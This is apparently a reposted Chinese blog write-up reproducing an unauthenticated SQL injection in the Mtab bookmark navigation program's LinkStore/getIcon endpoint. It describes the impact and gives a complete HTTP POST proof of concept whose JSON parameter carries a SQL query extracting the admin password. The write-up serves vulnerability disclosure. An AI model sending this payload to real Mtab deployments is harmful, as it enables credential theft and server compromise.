博客
关于我
Mtab书签导航程序 LinkStore/getIcon SQL注入漏洞复现
阅读量:798 次
发布时间:2023-02-10

本文共 746 字,大约阅读时间需要 2 分钟。

Mtab书签导航程序安全审计报告

产品简介

Mtab书签导航程序是一款专注于网页和应用书签管理的免费浏览器插件。作为一款无广告的在线书签工具,它支持多端同步、美观易用的导航体验,旨在帮助用户高效管理网页和应用,提升在线浏览效率。

漏洞发现

在安全测试中,我们发现该程序的LinkStore/getIcon接口存在严重的SQL注入漏洞。该漏洞未经身份验证,攻击者可利用这一漏洞获取以下信息:

  • 数据库中的敏感信息,包括管理员后台密码和用户个人信息
  • 高权限权限下,可向服务器中写入木马程序,进一步获取系统权限

复现环境

  • 工具:使用常见的Web安全工具进行请求构造
  • 目标URL/LinkStore/getIcon
  • 请求方法:POST请求
  • 请求头
    Host: [目标域名]User-Agent: [模拟浏览器信息]
  • 内容类型:application/json

漏洞复现

通过对接口的仔细分析,我们成功构造了以下证明用例(PoC):

POST /LinkStore/getIcon HTTP/1.1Host: [目标域名]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Content-Type: application/jsonConnection: Keep-alive{  "param": "SELECT `user`.`password` FROM `user` WHERE `username`= 'admin'"}

总结

该漏洞对系统安全性构成重大威胁,建议及时修复并升级相关接口安全性。

转载地址:http://ioffk.baihongyu.com/

你可能感兴趣的文章
Objective-C实现获取CPU温度(附完整源码)
查看>>
Objective-C实现获取文件头的50个字符(附完整源码)
查看>>
Objective-C实现随机图生成器算法(附完整源码)
查看>>
OJ中常见的一种presentation error解决方法
查看>>
OK335xS UART device registe hacking
查看>>
ok6410内存初始化
查看>>
one_day_one--mkdir
查看>>
OpenCV 中的图像转换
查看>>
opencv5-图像混合
查看>>
opencv9-膨胀和腐蚀
查看>>
OpenCV与AI深度学习 | YOLO11介绍及五大任务推理演示(目标检测,图像分割,图像分类,姿态检测,带方向目标检测)
查看>>
OpenCV与AI深度学习 | 使用Python和OpenCV实现火焰检测(附源码)
查看>>
OpenCV与AI深度学习 | 使用YOLO11实现区域内目标跟踪
查看>>
OpenCV与AI深度学习 | 使用YOLOv8做目标检测、实例分割和图像分类(包含实例操作代码)
查看>>
OpenCV与AI深度学习 | 基于PyTorch实现Faster RCNN目标检测
查看>>
OpenCV与AI深度学习 | 基于PyTorch语义分割实现洪水识别(数据集 + 源码)
查看>>
OpenCV与AI深度学习 | 基于YOLOv8的停车对齐检测
查看>>
OpenCV与AI深度学习 | 基于机器视觉的磁瓦表面缺陷检测方案
查看>>
Opencv中KNN背景分割器
查看>>
OpenCV中基于已知相机方向的透视变形
查看>>